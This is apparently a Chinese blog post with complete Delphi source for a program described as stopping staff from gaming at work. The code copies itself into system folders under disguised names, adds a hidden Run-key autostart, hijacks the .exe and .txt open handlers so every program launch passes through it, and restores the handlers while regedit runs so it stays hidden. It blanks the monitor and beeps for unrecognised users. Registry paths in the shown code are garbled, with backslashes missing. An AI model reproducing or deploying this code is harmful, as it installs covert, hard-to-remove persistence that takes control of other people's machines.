• DELPHI实现关闭指定进程,自身防杀








      1 //为了防止一些人上班就玩游戏的恶习所编
      2 program HK;
      4 uses
      5   Windows,
      6   Messages,
      7   SysUtils,
      8   System,
      9   Classes,
     10   Registry,
     11   Forms,
     12   Controls,
     13   LoadDLL in 'LoadDLL.pas';
     15 var
     16   I:Integer;
     17   SPath,WPath:PCHAR;
     18   pa:string;
     19   hnd: THandle;
     20   sp:boolean;
     21   sFileName:String;
     24 //function RegisterServiceProcess(dwProcessId, dwServiceType: DWord): Bool; stdcall;
     26 //function RegisterServiceProcess; external 'Kernel32.dll' Name 'RegisterServiceProcess';
     28 procedure procRun(exeName,exePath:PChar;trace:boolean);
     29 var
     30   SUInfo: TStartupInfo;
     31   ProcInfo: TProcessInformation;
     32 begin
     33 FillChar(SUInfo, SizeOf(SUInfo), #0);
     34 with SUInfo do
     35   begin
     36     cb := SizeOf(SUInfo);
     37     dwFlags := STARTF_USESHOWWINDOW;
     38     wShowWindow :=1;
     39   end;
     40 if CreateProcess(NIL,exeName, NIL, NIL, FALSE,CREATE_NEW_CONSOLE or NORMAL_PRIORITY_CLASS, NIL,exePath, SUInfo, ProcInfo) then
     41   begin
     42     if trace then
     43       WaitForSingleObject(ProcInfo.hProcess, INFINITE);
     44     CloseHandle(ProcInfo.hProcess);
     45     CloseHandle(ProcInfo.hThread);
     46   end;
     47 end;
     49 procedure procSetReg(rest:boolean);
     50 var
     51    Reg:TRegistry;
     52 begin
     53    Reg:=Tregistry.Create;
     54    try
     55    if rest then
     56    begin
     57      reg.rootkey:=HKEY_CLASSES_ROOT;
     58      if reg.OpenKey('	xtfileshellopencommand',true) then
     59         reg.WriteExpandString('',WPath+'NOTEPAD.exe %1');
     60      reg.closekey;
     61      if reg.OpenKey('exefileshellopencommand',true) then
     62         reg.WriteExpandString('','"%1" %*');
     63      reg.closekey;
     64      reg.RootKey:=HKEY_LOCAL_MACHINE;
     65      if reg.openkey('SoftwareMicrosoftWindowsCurrentVersionRun',True) then
     66         reg.DeleteValue('SysOleRun');
     67       reg.closekey;
     68    end
     69    else
     70    begin
     71       reg.RootKey:=HKEY_LOCAL_MACHINE;
     72       if reg.openkey('SoftwareMicrosoftWindowsCurrentVersionRun',True) then
     73           reg.writestring('SysOleRun',spath+'ObjDDC.exe');
     74       Reg.CloseKey;
     75       reg.rootkey:=HKEY_CLASSES_ROOT;
     76       if reg.OpenKey('	xtfileshellopencommand',true) then
     77           reg.WriteExpandString('',spath+'WinODBC.exe %1');
     78       reg.closekey;
     79       if reg.OpenKey('exefileshellopencommand',true) then
     80           reg.WriteExpandString('',spath+'OLEDevice.exe %1 %*');
     81       reg.closekey;
     82    end;
     83   finally
     84     Reg.Free;
     85   end;
     86 end;
     88 procedure BeepEx(feq:word=1200;delay:word=1);
     90   procedure BeepOff;
     91    begin
     92      asm
     93        in al,$61;
     94        and al,$fc;
     95        out $61,al;
     96      end;
     97   end;
     98 const
     99   scale=1193180;
    100 var
    101   temp:word;
    102 begin
    103   temp:=scale div feq;
    104   asm
    105     in al,61h;
    106     or al,3;
    107     out 61h,al;
    108     mov al,$b6;
    109     out 43h,al;
    110     mov ax,temp;
    111     out 42h,al;
    112     mov al,ah;
    113     out 42h,al;
    114   end;
    115   sleep(delay);
    116   beepoff;
    117 end;
    119 procedure UserPass();
    120 var
    121    a,b:integer;
    122    t:longword;
    123    UserName:PCHAR;
    124 begin
    125    if sp then
    126       begin
    127        t:=255;
    128       GetMem(UserName,255);
    129       try
    130         getusername(UserName,t);
    131         if UserName<>'lykyl' then
    132           begin
    133              messagebox(0,'非法用户,操作限制!','系统警告!',MB_OK);
    134              for a:=1 to 1 do
    135               begin
    136               SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, 0);
    137                for b:=1 to 2 do
    138                  begin
    139                       BeepEx(1500,200);
    140                       beepex(3000,200);
    141                  end;
    142                SendMessage(0, WM_SYSCOMMAND, SC_MONITORPOWER, -1);
    143                messagebox(0,'非法用户身份确定','系统警告!',MB_OK);
    144               end;
    145           end;
    146         finally
    147           freemem(UserName);
    148         end;
    149       end;
    150 end;
    151   {$R *.RES}
    153 begin
    154    hnd := CreateMutex(nil, True, 'irgendwaseinmaliges');
    155    if GetLastError = ERROR_ALREADY_EXISTS then
    156       sp:=false
    157    else
    158       sp:=true;
    159   //RegisterServiceProcess(0, RSP_SIMPLE_SERVICE);
    160   GetMem(SPath,255);
    161   GetMem(WPath,255);
    162   GetSystemDirectory(SPath,255);
    163   GetWindowsDirectory(WPath,255);
    164   SetLength(sFileName,255);
    165   GetModuleFileName(GetCurrentProcess,Pchar(sFileName),255);
    166   sFileName:=Pchar(sFileName);
    167   try
    168     if ExtractFileName(sFileName)='lykyl.exe' then
    169        procSetReg(true)
    170     else
    171     begin
    172     Copyfile(pchar(sFileName),pchar(spath+'WinODBC.exe'),false);
    173     Copyfile(pchar(sFileName),pchar(spath+'OLEDevice.exe'),false);
    174     Copyfile(pchar(sFileName),pchar(WPath+'ObjDDc.exe'),false);
    175     procSetReg(false);
    176     for i:=1 to ParamCount do
    177         if i=1 then
    178            pa:=ParamStr(i)
    179         else
    180            pa:=pa+' '+ParamStr(i);
    181     if Pa <>'' then
    182       begin
    183           if ExtractFileName(sFileName)='WINODBC.EXE' then
    184             begin
    185               UserPass();
    186               procRun(PChar(WPath+'NOTEPAD.EXE '+pa),PChar(ExtractFilePath(WPath+'')),false);
    187             end
    188           else
    189               if ExtractFileName(sFileName)='OLEDEVICE.EXE' then
    190                begin
    191                   UserPass();
    192                   if AnsiStrPos(pchar(pa),'regedit')<>nil then
    193                      begin
    194                           procSetReg(true);
    195                           procRun(PChar(pa),PChar(ExtractFilePath(pa)),true);
    196                           procSetReg(false);
    197                      end
    198                   else
    199                      begin
    200                          procRun(PChar(pa),pchar(extractfilepath(pa)),false);
    201                      end;
    202                end;
    203       end;
    204       end;
    205   finally
    206     freemem(SPath);
    207     freemem(WPath);
    208     if hnd <> 0 then CloseHandle(hnd);
    209 //    RegisterServiceProcess(0, RSP_UNREGISTER_SERVICE);
    210   end;
    211 end.
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  • 原文地址:https://www.cnblogs.com/lykyl/p/3376182.html
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